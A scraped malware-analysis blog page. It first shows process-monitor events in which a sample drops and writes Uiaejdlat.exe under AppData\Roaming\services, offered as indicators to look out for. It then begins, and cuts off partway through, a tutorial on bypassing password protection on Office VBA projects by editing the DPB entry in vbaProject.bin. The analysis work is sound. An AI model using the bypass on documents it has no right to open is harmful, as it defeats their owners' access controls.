HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Disable8And16BitMitigation</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"CreateFile"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">CreateFile</td><td data-sheets-value="{"1":2,"2":"C:\\Windows\\SysWOW64\\rpcss.dll"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 196px;">
<div style="float: left;">
C:\Windows\SysWOW64\rpcss.dll</div>
</div>
</td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"RegOpenKey"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">RegOpenKey</td><td data-sheets-value="{"1":2,"2":"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 398px;">
<div style="float: left;">
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"RegCloseKey"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">RegCloseKey</td><td data-sheets-value="{"1":2,"2":"HKLM\\Software\\Wow6432Node\\Microsoft\\Cryptography\\Offload"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 398px;">
<div style="float: left;">
HKLM\Software\Wow6432Node\Microsoft\Cryptography\Offload</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"CreateFile"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">CreateFile</td><td data-sheets-value="{"1":2,"2":"C:\\Users\\Vishal Thakur\\AppData\\Local\\Temp\\~DF77D59600395B2DB0.TMP"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 499px;">
<div style="float: left;">
C:\Users\Vishal Thakur\AppData\Local\Temp\~DF77D59600395B2DB0.TMP</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"RegOpenKey"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">RegOpenKey</td><td data-sheets-value="{"1":2,"2":"HKLM\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 600px;">
<div style="float: left;">
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"RegOPenKey"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">RegOPenKey</td><td data-sheets-value="{"1":2,"2":"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\2\\KnownFolders"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 600px;">
<div style="float: left;">
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\KnownFolders</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"CreateFile"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">CreateFile</td><td data-sheets-value="{"1":2,"2":"C:\\Users\\Vishal Thakur\\AppData\\Roaming"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 297px;">
<div style="float: left;">
C:\Users\Vishal Thakur\AppData\Roaming</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"CreateFile"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">CreateFile</td><td data-sheets-value="{"1":2,"2":"C:\\Users\\Vishal Thakur\\AppData\\Roaming\\services"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 297px;">
<div style="float: left;">
C:\Users\Vishal Thakur\AppData\Roaming\services</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"CreateFile"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">CreateFile</td><td data-sheets-value="{"1":2,"2":"C:\\Users\\Vishal Thakur\\AppData\\Roaming\\services\\Uiaejdlat.exe"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 398px;">
<div style="float: left;">
C:\Users\Vishal Thakur\AppData\Roaming\services\Uiaejdlat.exe</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"CreateFile"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">CreateFile</td><td data-sheets-value="{"1":2,"2":"C:\\Windows\\SysWOW64\\ntmarta.dll"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 297px;">
<div style="float: left;">
C:\Windows\SysWOW64\ntmarta.dll</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"SetEndOfFileInformationFile"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">SetEndOfFileInformationFile</td><td data-sheets-value="{"1":2,"2":"C:\\Users\\Vishal Thakur\\AppData\\Roaming\\services\\Uiaejdlat.exe"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 398px;">
<div style="float: left;">
C:\Users\Vishal Thakur\AppData\Roaming\services\Uiaejdlat.exe</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"WriteFile"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">WriteFile</td><td data-sheets-value="{"1":2,"2":"C:\\Users\\Vishal Thakur\\AppData\\Roaming\\services\\Uiaejdlat.exe"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 398px;">
<div style="float: left;">
C:\Users\Vishal Thakur\AppData\Roaming\services\Uiaejdlat.exe</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"Thread Exit"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">Thread Exit</td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"Process Exit"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">Process Exit</td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"CloseFile"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">CloseFile</td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"RegOpenKey"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">RegOpenKey</td><td data-sheets-value="{"1":2,"2":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Uiaejdlat.exe"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 600px;">
<div style="float: left;">
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Uiaejdlat.exe</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"CreateFile"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">CreateFile</td><td data-sheets-value="{"1":2,"2":"C:\\Users\\Vishal Thakur\\AppData\\Roaming\\services\\Uiaejdlat.exe"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 398px;">
<div style="float: left;">
C:\Users\Vishal Thakur\AppData\Roaming\services\Uiaejdlat.exe</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
</tbody></table>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
*Uiaejdlat.exe will obviously change with every binary - lookout for the reg entries and file creations. </div>
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-56009211966946647512017-12-04T01:49:00.001-08:002017-12-04T01:49:45.972-08:00Cracking password protected VBA Project code - macro code in complex encryption <div dir="ltr" style="text-align: left;" trbidi="on">
It's pretty well documented on the internet how you can crack a password protected project code in office documents. It works <i>almost</i> in all cases :)<br />
<br />
If the document is protected using a different scheme, you will not find the DPB entry for password in the hex code. This becomes a bit of an annoyance.<br />
<br />
Here's how to crack quickly. <br />
<br />
The file asks for a password when you try to look into the project code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhldXEpZd-znzw1P9whGf49_-kNCgkbPBnB_MztV4tq8Quge8n8ZmRa_Z4InQyS3Nyc-m_SMJqqycST_LgrwjAE98XnOLncq1tt2Nlz5nPG25HsKCBFMSPUcrgM_uvTMqMnGwn1i0cUEOTJ/s1600/12.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="407" data-original-width="785" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhldXEpZd-znzw1P9whGf49_-kNCgkbPBnB_MztV4tq8Quge8n8ZmRa_Z4InQyS3Nyc-m_SMJqqycST_LgrwjAE98XnOLncq1tt2Nlz5nPG25HsKCBFMSPUcrgM_uvTMqMnGwn1i0cUEOTJ/s320/12.PNG" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
1. Save the file on your desktop.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLnMsDmsX1wyceZaVmVbQMHzgkX8DE8Cy0433V-XC-_E6KB45E7AsK8amwQEPbKNLJSnzOkv9VzFxKeQKGYwyumk4R2sSECal97W69KGH3Vo3q-xThVmTxOWKjbYdMtmITqdKPw5pqVJZd/s1600/1.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="157" data-original-width="579" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLnMsDmsX1wyceZaVmVbQMHzgkX8DE8Cy0433V-XC-_E6KB45E7AsK8amwQEPbKNLJSnzOkv9VzFxKeQKGYwyumk4R2sSECal97W69KGH3Vo3q-xThVmTxOWKjbYdMtmITqdKPw5pqVJZd/s320/1.PNG" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
Try to load this into a hex editor and see if you can find the DPB entry - you won't.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdqPD6LcMtgNXkyYpT5_wzesCjv8qmJfibS9xsDR3z8TAq2qu4BXOPfohZHUNTLt_e45drulvrvZWhgud6oAoY8azvyup9wsMS3s-ZIuZaSjwAFFcPlImxU8W5l6Qb55mzmN16ApskTsdS/s1600/2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="831" data-original-width="1415" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdqPD6LcMtgNXkyYpT5_wzesCjv8qmJfibS9xsDR3z8TAq2qu4BXOPfohZHUNTLt_e45drulvrvZWhgud6oAoY8azvyup9wsMS3s-ZIuZaSjwAFFcPlImxU8W5l6Qb55mzmN16ApskTsdS/s320/2.PNG" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZCiKwMUy3cGoeBN-1eBPPEMxBYmSZRRRJD2i72xyELPla5hhA23SGpqojr5gnwoSClyBOeiK6Glo0-hQlnMbL2RTCfQWNQeDx9HdtILQZwtCv9ll5V2VjnFqLKDjCKfVP0GVYHs17cthm/s1600/3.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="451" data-original-width="763" height="189" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZCiKwMUy3cGoeBN-1eBPPEMxBYmSZRRRJD2i72xyELPla5hhA23SGpqojr5gnwoSClyBOeiK6Glo0-hQlnMbL2RTCfQWNQeDx9HdtILQZwtCv9ll5V2VjnFqLKDjCKfVP0GVYHs17cthm/s320/3.PNG" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now follow on to the next step. <br />
<br />
2. Change the file extention to 'zip'<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3LH-_mVsL9jdtv6GvIivB0Wb7DFz67YncNGUPxkL7VW77ao9XkpJjff9rDOWtfCrgCo7kzLNKEUNDuHEa7mxgwwY7eXDMeVOA8Pepz2UMenCG3BO-4s1RMmhp25m6OOxz0uniwueHYLit/s1600/4.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="177" data-original-width="621" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3LH-_mVsL9jdtv6GvIivB0Wb7DFz67YncNGUPxkL7VW77ao9XkpJjff9rDOWtfCrgCo7kzLNKEUNDuHEa7mxgwwY7eXDMeVOA8Pepz2UMenCG3BO-4s1RMmhp25m6OOxz0uniwueHYLit/s320/4.PNG" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdpN49FArx5Z5npCuTuFxTzjNLfn4-Hvbr2NDL-ix1rojSeh77DUmtL6GC0n2dqZbMJIwPfM2hdSBJjdi1FIHWmpjY3fhhktmjwGK8ZYCFTlP-OpzruHOCpWlw0Yqtp969QH7x47PZZRb0/s1600/5.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="193" data-original-width="557" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdpN49FArx5Z5npCuTuFxTzjNLfn4-Hvbr2NDL-ix1rojSeh77DUmtL6GC0n2dqZbMJIwPfM2hdSBJjdi1FIHWmpjY3fhhktmjwGK8ZYCFTlP-OpzruHOCpWlw0Yqtp969QH7x47PZZRb0/s320/5.PNG" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
3. Now simply double-click on this archive to enter the compressed file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcCda2pyg52ymsSipLCoWWEXqoqHJpdk611-9wtNG1Pi3dDLnmKkoDt_mwTzPvsVUmisiVTr_0cFt-zfY40G_c72OCmk5Tn-r7H03iq5rFVTxMTOJIGFZCjSOGphpHT0h_oMHP-nhsxUJu/s1600/6.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="341" data-original-width="657" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcCda2pyg52ymsSipLCoWWEXqoqHJpdk611-9wtNG1Pi3dDLnmKkoDt_mwTzPvsVUmisiVTr_0cFt-zfY40G_c72OCmk5Tn-r7H03iq5rFVTxMTOJIGFZCjSOGphpHT0h_oMHP-nhsxUJu/s320/6.PNG" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
You will see a bunch of stuff. Go into the 'word' folder and look for the .bin file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3wFCuX_8ESXLCeNMBKejH2tEOobzh3qQbhdNZPY0hgp2WW7scvv76bvkvsNNVy6qZa_fpIZNAxxMcY48YSwXI99NF8EyfKBdZFbfY0sPAuV9rhJoqGUEIyJSNnaJSe8DoaVHtLU6JxI1v/s1600/7.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="767" data-original-width="771" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3wFCuX_8ESXLCeNMBKejH2tEOobzh3qQbhdNZPY0hgp2WW7scvv76bvkvsNNVy6qZa_fpIZNAxxMcY48YSwXI99NF8EyfKBdZFbfY0sPAuV9rhJoqGUEIyJSNnaJSe8DoaVHtLU6JxI1v/s320/7.PNG" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now, copy the bin file (vbaProject.bin) to a different location and open it in your favourite hex editor and search for DPB.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
